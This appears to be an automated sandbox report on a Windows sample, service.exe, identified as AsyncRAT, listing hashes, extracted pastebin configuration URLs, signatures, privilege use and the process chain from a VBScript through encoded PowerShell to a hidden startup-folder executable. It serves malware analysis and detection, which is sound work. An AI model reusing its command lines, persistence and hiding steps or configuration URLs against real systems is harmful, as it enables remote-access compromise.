Analysis
max time kernel
82s
max time network
108s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags
arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted
17/03/2023, 06:47
Static task
static1
General
Target
service.exe
Size
237KB
MD5
2941d6fca94a537479d4d2a12c8a0ed2
SHA1
6c8d05a2aefec10e7257fcbb2da8dfa822aacc1c
SHA256
087427c0b74d495483859b7e587ef1063529253a2490c892d09f04465ef4f2c0
SHA512
e04fc8b6ea6a36cd67a841dda96ddefbab77a0fb994f0eb771ff357df40355ca7fad3afa75254dcd8eae0753cc0a478180e6343ba1ca55c7edf82dbbb3851826
SSDEEP
3072:r4tWK9YMDbz6fV/NpbnyAGJwhOnQdT1MgvAOdj8MXoiTYfSHw69pJZXAqacHy1lg:m9j76xnImFZ1MmF8QTU/urSiLfTP8yl
Malware Config
Extracted
https://pastebin.com/raw/vNcCt60A
Extracted
asyncrat
0.5.7B
Default
Mutex
delay
3
install
false
install_folder
%AppData%
pastebin_config
https://pastebin.com/raw/3Z9zi18j
Signatures
Async RAT payload (3 IoCs)
resource  yara_rule
behavioral1/files/0x0008000000023154-199.dat  asyncrat
behavioral1/files/0x0008000000023154-200.dat  asyncrat
behavioral1/memory/4056-201-0x0000000000360000-0x0000000000372000-memory.dmp  asyncrat
Blocklisted process makes network request (2 IoCs)
flow  pid   Process
52    4688  powershell.exe
55    4688  powershell.exe
Downloads MZ/PE file
Sets file to hidden (1 TTPs, 1 IoCs)
Modifies file attributes to stop it showing in Explorer etc.
pid   Process
5064  attrib.exe
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
description        ioc  Process
Key value queried  \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation  service.exe
Key value queried  \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation  WScript.exe
Drops startup file (2 IoCs)
description                   ioc  Process
File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD7.exe  powershell.exe
File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD7.exe  attrib.exe
Executes dropped EXE (1 IoCs)
pid   Process
4056  tmp4DD7.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Modifies registry class (1 IoCs)
description  ioc  Process
Key created  \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings  service.exe
Suspicious behavior: EnumeratesProcesses (4 IoCs)
pid   Process
2328  powershell.exe
2328  powershell.exe
4688  powershell.exe
4688  powershell.exe
Suspicious use of AdjustPrivilegeToken (25 IoCs)
description                          pid   Process
Token: SeDebugPrivilege              2328  powershell.exe
Token: SeDebugPrivilege              4688  powershell.exe
Token: SeIncreaseQuotaPrivilege      4688  powershell.exe
Token: SeSecurityPrivilege           4688  powershell.exe
Token: SeTakeOwnershipPrivilege      4688  powershell.exe
Token: SeLoadDriverPrivilege         4688  powershell.exe
Token: SeSystemProfilePrivilege      4688  powershell.exe
Token: SeSystemtimePrivilege         4688  powershell.exe
Token: SeProfSingleProcessPrivilege  4688  powershell.exe
Token: SeIncBasePriorityPrivilege    4688  powershell.exe
Token: SeCreatePagefilePrivilege     4688  powershell.exe
Token: SeBackupPrivilege             4688  powershell.exe
Token: SeRestorePrivilege            4688  powershell.exe
Token: SeShutdownPrivilege           4688  powershell.exe
Token: SeDebugPrivilege              4688  powershell.exe
Token: SeSystemEnvironmentPrivilege  4688  powershell.exe
Token: SeRemoteShutdownPrivilege     4688  powershell.exe
Token: SeUndockPrivilege             4688  powershell.exe
Token: SeManageVolumePrivilege       4688  powershell.exe
Token: 33                            4688  powershell.exe
Token: 34                            4688  powershell.exe
Token: 35                            4688  powershell.exe
Token: 36                            4688  powershell.exe
Token: SeDebugPrivilege              4056  tmp4DD7.exe
Token: SeDebugPrivilege              4056  tmp4DD7.exe
Suspicious use of WriteProcessMemory (15 IoCs)
description                       pid   Process         procid_target
PID 4284 wrote to memory of 2924  4284  service.exe     86
PID 4284 wrote to memory of 2924  4284  service.exe     86
PID 4284 wrote to memory of 2924  4284  service.exe     86
PID 2924 wrote to memory of 2328  2924  WScript.exe     87
PID 2924 wrote to memory of 2328  2924  WScript.exe     87
PID 2924 wrote to memory of 2328  2924  WScript.exe     87
PID 2328 wrote to memory of 4688  2328  powershell.exe  91
PID 2328 wrote to memory of 4688  2328  powershell.exe  91
PID 2328 wrote to memory of 4688  2328  powershell.exe  91
PID 4688 wrote to memory of 5064  4688  powershell.exe  106
PID 4688 wrote to memory of 5064  4688  powershell.exe  106
PID 4688 wrote to memory of 5064  4688  powershell.exe  106
PID 4688 wrote to memory of 4056  4688  powershell.exe  107
PID 4688 wrote to memory of 4056  4688  powershell.exe  107
PID 4688 wrote to memory of 4056  4688  powershell.exe  107
Views/modifies file attributes (1 TTPs, 1 IoCs)
pid   Process
5064  attrib.exe
Processes
1. C:\Users\Admin\AppData\Local\Temp\service.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\service.exe"
   - Checks computer location settings
   - Modifies registry class
   - Suspicious use of WriteProcessMemory
   PID: 4284
   2. C:\Windows\SysWOW64\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\config.vbs"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      PID: 2924
      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
         Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Unrestricted -nologo -command .\service.ps1
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory
         PID: 2328
         4. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand [base64-encoded command blob omitted]
            - Blocklisted process makes network request
            - Drops startup file
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 4688
            5. C:\Windows\SysWOW64\attrib.exe
               Command line: "C:\Windows\System32\attrib.exe" +s +h .\\tmp4DD7.exe
               - Sets file to hidden
               - Drops startup file
               - Views/modifies file attributes
               PID: 5064
            5. C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD7.exe
               Command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmp4DD7.exe"
               - Executes dropped EXE
               - Suspicious use of AdjustPrivilegeToken
               PID: 4056
Network
MITRE ATT&CK Enterprise v6
Downloads